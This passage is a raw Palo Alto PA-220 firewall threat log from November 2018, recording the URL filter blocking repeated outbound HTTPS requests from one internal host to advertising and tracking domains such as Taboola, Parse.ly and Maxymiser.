16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,"cdn.taboola.com/",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,"rules.quantcount.com/",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,52.4.120.175,192.168.1.63,52.4.120.175,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,"srv-2018-11-30-22.config.parsely.com/",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,216.58.194.98,192.168.1.63,216.58.194.98,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,"www.googleadservices.com/",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,23.72.145.245,192.168.1.63,23.72.145.245,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,"service.maxymiser.net/",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28469,1,53152,443,30818,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7793,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28556,1,53155,443,64260,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7794,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28558,1,53158,443,7071,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7795,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:45:28 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28590,1,53167,443,25557,443,0x403000,tcp,block-url,"segment-data.zqtk.net/",(9999),business-and-economy,informational,client-to-server,7803,0x2000000000000000,192.168.0.0-192.168.255.255,United 